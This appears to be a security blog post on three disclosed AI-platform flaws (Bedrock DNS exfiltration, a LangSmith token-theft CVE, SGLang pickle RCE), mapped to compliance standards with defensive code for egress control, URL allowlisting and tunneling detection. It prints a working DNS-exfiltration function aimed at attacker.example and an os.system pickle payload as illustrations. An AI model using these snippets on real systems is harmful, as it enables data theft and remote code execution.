Three AI Platforms, Three Critical Flaws

Your AI infrastructure just became an exfiltration pipeline. Recent disclosures reveal how Amazon Bedrock, LangSmith, and SGLang each failed fundamental security controls—and how those failures map directly to requirements you're already supposed to meet.

What Happened

Three separate research teams disclosed vulnerabilities in widely-deployed AI platforms:

Amazon Bedrock (BeyondTrust disclosure): The platform's sandbox mode permits outbound DNS queries, allowing attackers to exfiltrate data and execute commands through DNS tunneling—despite the sandbox being marketed as network-isolated.

LangSmith (Miggo Security disclosure): CVE-2026-25750 allows attackers to steal authentication tokens and take over accounts through URL parameter injection. The flaw stems from improper input validation on user-supplied URLs.

SGLang (CERT Coordination Center advisory): Two vulnerabilities—CVE-2026-3059 and CVE-2026-3060—permit remote code execution through unsafe pickle deserialization. Attackers can execute arbitrary code by sending malicious serialized objects to the framework.

None of these are zero-days requiring nation-state resources. Each exploits a control gap that existing standards already address.

Timeline

The exact discovery and exploitation timelines remain under disclosure coordination. What matters: these vulnerabilities existed in production environments processing sensitive data before patches became available. The DNS exfiltration vector in Bedrock is particularly concerning because it operates silently—no failed authentication attempts, no unusual file access patterns, just routine DNS traffic carrying encoded payloads.

Which Controls Failed

Network Segmentation (Bedrock)

Amazon Bedrock's sandbox allowed outbound DNS queries. This violates the core principle of network isolation: if you're running untrusted code in a sandbox, that sandbox shouldn't have unrestricted network access—especially not to services that can encode arbitrary data.

The failure isn't that DNS queries are inherently dangerous. The failure is treating "sandbox mode" as sufficient isolation without implementing egress filtering. Your firewall rules should answer: what external services does this AI workload legitimately need? If the answer is "none," then DNS queries to attacker-controlled domains shouldn't be possible.
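
To see how little an attacker needs, here is a conceptual sketch of DNS tunneling (`attacker.example` is a placeholder domain; the snippet performs only ordinary lookups, which is exactly why the traffic blends in):

```python
import base64
import socket

def exfiltrate_via_dns(data: bytes, domain: str = "attacker.example") -> None:
    """Encode data into DNS labels and 'send' it by resolving subdomains.

    The attacker-controlled nameserver for `domain` simply logs each
    query name and decodes the labels on the other end.
    """
    # base32 keeps every character legal in a DNS label
    encoded = base64.b32encode(data).decode().rstrip("=").lower()
    # individual DNS labels are capped at 63 characters
    chunks = [encoded[i:i + 63] for i in range(0, len(encoded), 63)]
    for seq, chunk in enumerate(chunks):
        try:
            # the lookup itself is the exfiltration channel
            socket.getaddrinfo(f"{seq}.{chunk}.{domain}", None)
        except socket.gaierror:
            pass  # NXDOMAIN is fine; the query already reached the resolver

exfiltrate_via_dns(b"api_key=sk-live-0123456789")  # placeholder secret
```

Blocking direct port-53 egress and forcing workloads through a logging resolver you control turns this invisible channel into an auditable one.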

Standard mapping: NIST 800-53 Rev 5 control SC-7 (Boundary Protection) requires monitoring and controlling communications at external boundaries, with enhancements covering network segmentation. PCI DSS v4.0.1 Requirements 1.3.1 and 1.3.2 mandate restricting inbound and outbound traffic, respectively, to that which is necessary. A sandbox that allows arbitrary DNS queries fails both.

Input Validation (LangSmith)

LangSmith's CVE-2026-25750 stems from accepting user-supplied URLs without proper validation. The application trusted that URL parameters would be benign, allowing attackers to inject malicious values that the system then processed.

This is A03:2021 – Injection from the OWASP Top 10: external input accepted, used in a security-sensitive context (an authentication flow), and never validated against expected patterns.

Standard mapping: OWASP ASVS v4.0.3 Section 5.1 requires input validation on all untrusted data. ISO/IEC 27001:2022 Annex A control 8.28 (secure coding) covers validating input in applications. If your AI platform accepts URLs from users, you need to validate format, allowlist permitted domains, and sanitize before processing.
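
A minimal sketch of that pattern, assuming the application only needs to reach a small, known set of hosts (the allowlist entries below are illustrative placeholders):

```python
from urllib.parse import urlparse

ALLOWED_SCHEMES = {"https"}
ALLOWED_HOSTS = {"api.example.com", "hooks.example.com"}  # illustrative

def validate_callback_url(raw_url: str) -> str:
    """Reject any user-supplied URL outside the explicit allowlist."""
    parsed = urlparse(raw_url)
    if parsed.scheme not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parsed.scheme!r}")
    if parsed.hostname not in ALLOWED_HOSTS:  # hostname is already lowercased
        raise ValueError(f"host not allowed: {parsed.hostname!r}")
    if parsed.username or parsed.password:
        raise ValueError("userinfo in URLs is not accepted")
    return raw_url

validate_callback_url("https://api.example.com/v1/traces")    # passes
# validate_callback_url("https://api.example.com@evil.test/") # raises: host
```

Exact-match checks on the parsed hostname close the classic bypasses (userinfo tricks, lookalike prefixes) that naive substring checks such as `"example.com" in url` leave open.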

Secure Coding Practices (SGLang)

SGLang's use of pickle deserialization for handling untrusted data represents a known-dangerous pattern. Python's pickle module documentation explicitly warns against deserializing data from untrusted sources—yet the framework did exactly that.

The CVE-2026-3059 and CVE-2026-3060 vulnerabilities allow remote code execution because the application deserializes attacker-controlled objects without verification. This isn't a novel attack vector; it's a well-documented anti-pattern.
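
It is also easy to demonstrate. A self-contained sketch of why `pickle.loads` on attacker-controlled bytes amounts to remote code execution (the echoed command stands in for an arbitrary payload):

```python
import os
import pickle

class Exploit:
    def __reduce__(self):
        # pickle calls __reduce__ to learn how to rebuild the object;
        # returning (callable, args) makes that callable run at load time
        return (os.system, ("echo arbitrary code ran during deserialization",))

payload = pickle.dumps(Exploit())  # what an attacker would send
pickle.loads(payload)              # runs the command; no Exploit class needed
```

Nothing about the class needs to exist on the receiving side; the payload itself carries the instruction to call `os.system` directly.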

Standard mapping: OWASP Top 10 2021 A08:2021 – Software and Data Integrity Failures covers insecure deserialization. NIST 800-53 Rev 5 SI-10 requires information input validation. PCI DSS v4.0.1 Requirement 6.2.4 mandates that software engineering techniques prevent or mitigate common software attacks.

What the Standards Require

These incidents map to controls you're likely already attesting to:

For network isolation: Implement egress filtering at the network boundary. If your AI workload runs in a sandbox, define an allowlist of required external services. Block everything else. NIST CSF v1.1 subcategories PR.AC-5 (network segregation) and PR.PT-4 (communications and control networks protection) both apply; CSF v2.0 consolidates these under PR.IR (Technology Infrastructure Resilience).

For input validation: Treat all external input as hostile. URL parameters, file uploads, API payloads—validate format, length, and content against expected patterns before processing. This satisfies OWASP ASVS v4.0.3 requirements and ISO/IEC 27001:2022 Annex A control 8.28 (secure coding).

For deserialization: Never deserialize untrusted data using formats that permit code execution. If you must deserialize external data, use safe formats (JSON, Protocol Buffers) or implement signature verification. This addresses NIST 800-53 Rev 5 SI-10 and supports SOC 2 Type II CC6.1 (logical access controls).
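
Where an opaque payload format is unavoidable, authenticate the bytes before any parser sees them. A minimal HMAC-SHA256 sketch, assuming a properly managed shared secret (the hardcoded key is a placeholder):

```python
import hashlib
import hmac
import json

SECRET_KEY = b"replace-with-a-managed-secret"  # placeholder; use a secrets store

def sign(payload: bytes) -> bytes:
    """Prefix the payload with an HMAC-SHA256 tag."""
    return hmac.new(SECRET_KEY, payload, hashlib.sha256).digest() + payload

def verify_and_load(blob: bytes) -> dict:
    """Verify the tag before parsing; reject anything unauthenticated."""
    tag, payload = blob[:32], blob[32:]
    expected = hmac.new(SECRET_KEY, payload, hashlib.sha256).digest()
    if not hmac.compare_digest(tag, expected):
        raise ValueError("payload failed integrity check")
    return json.loads(payload)  # JSON cannot smuggle executable objects

blob = sign(json.dumps({"model": "demo", "temperature": 0.2}).encode())
print(verify_and_load(blob))
```

The JSON choice is deliberate: even if verification were somehow bypassed, the parser cannot instantiate arbitrary objects the way pickle can.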

Lessons and Action Items

Audit Your AI Infrastructure

Map every AI platform you're running against these questions:

  • What network access does it have? Can it make outbound connections?
  • What external input does it accept? URLs, file uploads, API calls?
  • Does it deserialize data from external sources? Using what format?

For each "yes," document the control that prevents exploitation. If you can't name the control, you have a gap.

Implement Defense in Depth for AI Workloads

Don't rely on vendor-provided "sandbox mode" as your only isolation layer. Add network segmentation, egress filtering, and monitoring. Your SIEM should alert on unexpected DNS queries from AI workloads—especially queries to newly registered domains or domains with high-entropy subdomains (a common sign of DNS tunneling).
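
As a starting point for that alert, a hedged sketch of the entropy heuristic; the threshold and minimum label length are illustrative tuning assumptions, not vetted values:

```python
import math
from collections import Counter

def shannon_entropy(label: str) -> float:
    """Bits per character; encoded payloads score higher than real words."""
    counts = Counter(label)
    return -sum(
        (n / len(label)) * math.log2(n / len(label)) for n in counts.values()
    )

def looks_like_tunneling(qname: str, threshold: float = 3.8) -> bool:
    """Flag queries with a long, high-entropy subdomain label."""
    # drop the last two labels (registrable domain + TLD)
    labels = qname.rstrip(".").split(".")[:-2]
    return any(len(l) >= 16 and shannon_entropy(l) > threshold for l in labels)

print(looks_like_tunneling("www.example.com"))                        # False
print(looks_like_tunneling("mzxw6ytboi4dqmrqgm2a.attacker.example"))  # True
```

Feed it from your resolver logs and baseline against a week of legitimate traffic before paging anyone.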

Apply Least Privilege to IAM Roles

The Bedrock vulnerability becomes more severe if the compromised workload has broad IAM permissions. Review every IAM role attached to AI infrastructure. What's the minimum permission set required? Remove everything else. This limits blast radius when—not if—a vulnerability is exploited.
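
A small boto3 sketch can give that review a concrete starting point; `bedrock-workload-role` is a placeholder name, and the script only reads IAM metadata:

```python
import boto3  # needs credentials with iam:List*/iam:Get* permissions

iam = boto3.client("iam")

def audit_role(role_name: str) -> None:
    """Print every managed and inline policy on a role (pagination elided)."""
    attached = iam.list_attached_role_policies(RoleName=role_name)
    for policy in attached["AttachedPolicies"]:
        print(f"managed: {policy['PolicyName']} ({policy['PolicyArn']})")
    inline = iam.list_role_policies(RoleName=role_name)
    for name in inline["PolicyNames"]:
        doc = iam.get_role_policy(RoleName=role_name, PolicyName=name)
        print(f"inline:  {name} -> {doc['PolicyDocument']}")

audit_role("bedrock-workload-role")  # placeholder role name
```

Diff the printed inventory against the minimum set of actions the workload actually calls, and strip the rest.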

Require Security Review for AI Framework Updates

Treat AI frameworks like SGLang the same way you treat application dependencies. Before deploying a new version, review the changelog for security-relevant changes. If the framework handles deserialization, that's a red flag requiring extra scrutiny.

Test Your Detection Capabilities

Can your security tools detect DNS tunneling? Can they identify unusual outbound connections from supposedly isolated workloads? Run a purple team exercise: attempt DNS exfiltration from your AI environment. If your tools don't alert, fix your detection before an attacker discovers the same gap.

The common thread: these vulnerabilities exploited the gap between "AI platform" and "production security controls." Your AI infrastructure needs the same network segmentation, input validation, and secure coding practices as everything else you run. The standards already require it—now you need to enforce it.
